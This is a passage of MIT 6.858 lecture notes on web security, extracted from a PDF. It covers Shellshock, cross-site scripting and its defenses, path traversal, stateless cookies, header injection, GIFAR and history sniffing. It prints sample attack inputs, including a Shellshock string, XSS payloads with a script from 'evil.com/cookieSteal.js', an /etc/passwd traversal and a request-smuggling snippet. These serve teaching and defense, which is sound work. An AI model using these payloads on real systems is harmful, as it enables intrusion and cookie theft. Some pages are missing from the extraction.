MIT6 858F14 Lec9 PDF
MIT6 858F14 Lec9 PDF
MIT6 858F14 Lec9 PDF
858 Lecture 9
WEB
SECURITY: Part
II
Last lecture, we
looked
at a core security mechanism for the web: the same-‐origin
policy. In this lecture,
we'll continue to look at how we
can
build
secure web
applications.
The recent "Shell Shock"
bug
is a good example of how difficult it is to
design web
services that compose multiple technologies.
• A web client can include extra headers in its HTTP
requests, and determine
which query parameters are in a request. Ex:
o GET /query.cgi?searchTerm=cats HTTP
1.1
o Host:
www.example.com
o Custom-‐header:
Custom-‐value
• CGI
servers map the various components of the HTTP
request to Unix
environment variables.
• Vulnerability:
Bash
has
a parsing bug in the way that
it
handles the setting
of
environment variables!
If a string
begins
with a certain set of malformed bytes,
bash will
continue to parse
the rest
of the string
and execute any commands that
it finds! For example, if you set an environment variable to a value like this…
() { :;}; /bin/id
• …will
confuse the bash parser,
and cause it to execute the /bin/id command
(which displays the UID and GID information for the current
user).
• Live demo
o Step 1: Run the CGI
server.
§ ./victimwebserver.py 8082
Shell Shock is a particular instance of security bugs which arise from improper
content sanitzation. Another type of content sanitzation
failure
occurs
during
cross-‐
site scripting
attacks
(XSS).
Example: Suppose that a CGI
script embeds a query string parameter in the HTML
that it generates.
Demo:
• Step 1: Run the CGI
server.
o ./cgiServer.py
• Step 2: In browser,
load these URLs:
http://127.0.0.1:8282/cgi-bin/uploadRecv.py?msg=hello
http://127.0.0.1:8282/cgi-bin/uploadRecv.py?msg=<b>hello</b>
1
http://127.0.0.1:8282/cgi-
bin/uploadRecv.py?msg=<script>alert("XSS");</script>
http://127.0.0.1:8282/cgi-bin/uploadRecv.py?msg=<IMG
"""><SCRIPT>alert("XSS")</SCRIPT>">
//malformed HTML.
XSS defenses
• Chrome
and IE have a built-‐in
feature
which uses heuristics to detect
potential
cross-‐site scripting
attacks.
o Ex: Is a script
which is about to execute included
in the
request that
fetched
the enclosing
page?
§ http://foo.com?q=<script src="evil.com/cookieSteal.js"/>
o If so,
this is strong evidence that something suspicious
is about to
happen!
The attack above is called a "reflected XSS attack," because the
server "reflects"
or "returns" the attacker-‐supplied
code to
the
user's
browser, executing
it in the
context of the
victim page.
§ This is why
our first XSS
attack in the CGI
example didn't work—
the browser detected reflected JavaScript in the URL, and removed
the trailing </script>
before
it even reached
the CGI server.
§ However
. . .
o Filters
don't have
100% coverage, because there
are a huge number of
ways to
encode an XSS attack!
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
§ This is why
our second XSS
attack succeeded-‐-‐-‐the browser got
confused by our intentionally malformed HTML.
o Problem: Filters can't catch persistent XSS attacks in
which the server
saves attacker-‐provided data,
which is then permanently distributed to
clients.
§ Classic
example: A "comments" section which allows users to post
HTML messages.
2
§ Another example: Suppose that a dating site
allows
users to
include
HTML
in their profiles. An attacker can add HTML
that will
run in a *different* user's browser when that user looks at the
attacker's profile! Attacker could
steal the
user's cookie.
• Another XSS defense: "httponly" cookies.
o A server can tell a browser that
client-‐side JavaScript should
not be
able
to access a cookie.
[The server does this by adding the "Httponly"
token
to
a "Set-‐cookie" HTTP response
value.]
o This is only
a partial defense, since the attacker can still
issue requests
that contain a user's cookies (CSRF).
• Privilege separation: Use a separate domain for untrusted
content.
o For example, Google stores untrusted content in googleusercontent.com
(e.g., cached copies of pages, Gmail attachments).
o Even if XSS is possible
in the untrusted content,
the
attacker
code will run
in a different
origin.
o There may still be problems if the content in googleusercontent.com
points to URLs in google.com.
• Content sanitization:
Take
untrusted
content and encode it
in
a way that
constrains
how it can
be
interpreted.
o Ex: Django templates: Define an output page
as a bunch of HTML
that has some
"holes" where external content can be inserted.
[https://docs.djangoproject.com/en/dev/topics/templates/#automatico
htmlo escaping]
o A template might contain code like this…
§ <b>Hello {{ name }} </b>
o … where "name" is a variable that is resolved
when the
page
is processed
by the Django template engine. That engine will
take the value of "name" (e.g.,
from a usero supplied
HTTP query
string), and then automatically escape
dangerous characters. For example:
§ angle brackets < and > -‐-‐>
<
and
>
§ double
quotes
" -‐-‐>
"
o This prevents
untrusted
content from injecting
HTML
into
the
rendered
page.
o Templates cannot defend against all attacks! For example . . .
§ <div class={{ var }}>...</div>
3
• Content
Security Policy (CSP):
Allows a web server to
tell the
browser
which
kinds of resources
can be
loaded, and
the
allowable origins for those
resources.
o Server specifies one or more headers of the type "Content-‐Security-‐
Policy".
o Example:
§ Content-‐Security-‐Policy:
default-‐src
'self' *.mydomain.com
• Only allow content from the page's domain and its
subdomains.
o You
can specify
separate policies for where images can come from, where
scripts can come from, frames, plugins, etc.
o CSP
also
prevents inline JavaScript,
and JavaScript interfaces
like
eval()
which allow for dynamic JavaScript generation.
• Some browsers allow servers to disable content-‐type sniffing (X-‐Content-‐Type-‐
Options: nosniff).
You
can also run
into
problems if untrusted entities can supply
filenames.
• Ex: Suppose
that a web server reads files based on
user-‐supplied
parameters.
o open("/www/images/" + filename)
• Problem: filename might look like this:
o ../../../../../etc/passwd
• As with SQL injection, the server must sanitize the user input: the server must
reject file names with slashes, or encode the slashes in some way.
4
o A "web framework" is a software system that
provides infrastructure for
tasks like database accesses, session management, and the creation
of
templated content that
can
be used throughout
a site.
o Other frameworks
are more popular: PHP, Ruby
on Rails.
o In the enterprise
world,
Java
servlets and ASP are also widely used.
• Django developers have put some amount of thought
into security.
o So, Django
is a good case study to see how people implement web
security in practice.
• Django is probably better in terms of security than some of the alternatives like
PHP or Ruby
on Rails,
but the
devil is in the
details.
o As we'll discuss two lectures from now, researchers have invented some
frameworks that
offer provably better security.
§ [Ur/Web: http://www.impredicative.com/ur/]
Stateless cookies
• If you don't
have the notion of a session,
then you need to
authenticate
every
request!
o Idea: Authenticate the cookie using cryptography.
o Primitive: Message authentication codes (MACs)
§ Think of it like
a keyed
hash,
e.g., HMAC-‐SHA1:
H(k,
m)
§ -‐Client and server share
a key;
client uses key to produce
the
message, and the server uses the key to verify the message.
o AWS S3 REST Services use this kind of cookie
[http://docs.aws.amazon.com/AmazonS3/latest/dev/RESTAuthenticatio
n.html].
§ Amazon
gives each developer an
AWS
Access Key
ID,
and an
AWS
secret key.
Each
request looks like this:
5
GET /photos/cat.jpg HTTP/1.1
Host: johndoe.s3.amazonaws.com
Authorization: AWS
AKIAIOSFODNN7EXAMPLE:frJIUN8DYpKDtOLCwoyllqDzg=
|___________________| |________________________|
§ Here's what is signed
(this
is slightly simplified, see the link above
for the full story):
Content-MD5 + "\n" +
Content-Type + "\n" +
Date + "\n" +
ResourceName
o Note
that this
kind
of cookie
doesn't expire
in the traditional
sense
(although
the
server will reject the request if Amazon has revoked the
user's key).
§ You can embed an "expiration" field in a *particular*
request,
and
then
hand that
URL to a third-‐party,
such
that, if the
third-‐party
waits too long, AWS will
reject
the request
as expired.
AWSAccessKeyId=AKIAIOSFODNN7EXAMPLE&Expires=1141889120&Sign
ature=vjbyPxybd... |__________________|
signature!
o Note that the format for the string-‐to-‐hash should provide unambiguous
parsing!
§ Ex: No component should be allowed to embed the escape
character,
otherwise the
server-‐side
parser may get confused.
• Q: How
do you
log
out
with this kind of cookie design?
• A: Impossible, if the server is stateless (closing a session would require a server-‐
side table of revoked
cookies).
• If server can be stateful, session IDs make this much simpler.
• There's a fundamental trade-‐off
between reducing server-‐side
memory state and
increasing
server-‐side
computation overhead for cryptography.
6
o Benefit: The cookie is not
sent
over the network
to the server.
o Benefit: Your authentication scheme is not subject to complex same-‐
origin policy
for
cookies
(e.g., DOM storage
is bound to a single origin,
unlike a cookie, which can be bound to multiple subdomains).
• Client-‐side
X.509
certificates.
o Benefit: Web
applications can't
steal or explicitly manipulate each other's
certificates.
o Drawback:
Have
weak story
for revocation (we'll talk about this more in
future lectures).
o Drawback:
Poor usability-‐-‐-‐users don't want to manage a certificate for
each site
that they
visit!
o Benefit/drawback: There isn't
a notion
of a session,
since the certificate is
"always on." For important
operations, the
application will
have to
prompt for a password.
The web stack has some protocol ambiguities that
can
lead to security holes.
• HTTP
header injection from XMLHttpRequests
o Javascript can ask browser
to
add
extra headers
in the
request.
So, what
happens if we
do this?
x.open("GET", "http://foo.com");
x.setRequestHeader("Content-Length", "7");
//Overrides the browser-computed field!
x.send("Gotcha!\r\n" +
"GET /something.html HTTP/1.1\r\n" +
"Host: bar.com");
o The server at foo.com may interpret this as two separate requests! Later,
when
the browser receives the second request, it may overwrite a cache
entry
belonging
to
bar.com with content from foo.com!
o Solution: Prevent XMLHttpRequests
from setting sensitive
fields
like
"Host:"
or "Content-‐Length".
o Takehome point: Unambiguous encoding is critical!
Build
reliable
escaping/encoding!
• URL parsing ("The Tangled
Web"
page 154)
o Flash
had
a slightly
different URL
parser
than the browser.
o Suppose the URL was http://example.com:[email protected]/
§ Flash would compute the origin as "example.com".
7
o Leverage the fact that image renderers process a file
top-‐down,
whereas
decompressors for .zip files typically start from the end and go upwards.
o Attackers realized that .jar files are based on the .zip format!
o THUS
THE
GIFAR WAS BORN: half-‐gif,
half-‐jar, all-‐evil.
§ Really simple to make a GIFAR: Just use
"cat" on Linux
or "cp" on
Windows.
§ Suppose that target.com only allows external parties
to
upload
images objects.
The attacker
can
upload
a GIFAR, and the GIFAR
will
pass target.com's
image validation tests!
§ Then, if the
attacker
can
launch a XSS attack, the attacker can inject
HTML
which
refers to
the ".gif" as an applet.
<applet code="attacker.class"
archive="attacker.gif"
..>
§ The browser
will load
that applet and give it
the authority
of
target.com!
8
o This attack can
reveal your location
if the candidate images come from
geographically specific
images, e.g., Google Map tiles.
§ http://w2spconf.com/2014/papers/geo_inference.pdf
o Fix: No good ones. A page could never cache objects,
but this
will hurt
performance. But suppose
that a site
doesn't cache
anything. Is it safe
from history sniffing? No!
• Example #3: DNS-‐based attacks
o Attacker setup and goal are the same as before.
o Exploit vector: Attacker page generates references
to
objects
in various
domains. If the user has already
accessed objects from that domain, the
hostnames will already reside in the DNS cache, making subsequent
object accesses
faster!
§ http://sip.cs.princeton.edu/pub/webtiming.pdf
o Fix:
No good
ones. Could
use
raw IP
addresses for links,
but this
breaks
a
lot
of things (e.g. DNS-‐based load balancing).
However, suppose
that a
site
doesn't cache
anything and uses raw IP addresses for hostnames. Is it
safe from history sniffing? No!
• Example #4: Rendering attacks.
o Attacker setup and goal are the same as before.
o Exploit vector: Attacker page loads a candidate URL in an iframe. Before
the
browser
has
fetched the content,
the
attacker
page
can
access…
window.frames[1].location.href
o …and read the value that
the attacker set. However, once
the
browser
has
fetched
the content,
accessing that reference will return "undefined" due
to the same-‐origin
policy.
So, the attacker can
poll
the value and see how
long
it
takes to turn
"undefined".
If it
takes a long time, the page must not
have
been cached!
§ http://lcamtuf.coredump.cx/cachetime/firefox.html
o Fix: Stop using computers.
o Receiver defines an event handler
for the special "message" event. The
event handler receives the msg and the origin.
• Q: Why
does the receiver have to check
the origin of received message?
• A: To perform access control on senders! If the receiver implements sensitive
functionality, it shouldn't respond to requests from arbitary
• origins.
o Common
mistake: The receiver uses regular expressions
to
check the
sender's origin.
9
o Even if origin matches /.foo.com/, doesn't mean it's from foo.com! Could
be "xfoo.com", or "www.foo.com.bar.com".
o More
details:
https://www.cs.utexas.edu/~shmat/shmat_ndss13postman.pdf
• Q: Why
does the sender have to specify
the intended
origin of the
receiver?
• A: postMessage() is applied to a window, not an origin.
o Remember that an attacker may be able to navigate a window to a
different location.
o If the attacker navigates the window, another origin may receive
message!
o If the sender explictly specifies a target origin, the
browser
checks
recipient origin before delivering the msg.
o More details: http://css.csail.mit.edu/6.858/2013/readings/post-
message.pdf
10
MIT OpenCourseWare
http://ocw.mit.edu
For information about citing these materials or our Terms of Use, visit: http://ocw.mit.edu/terms.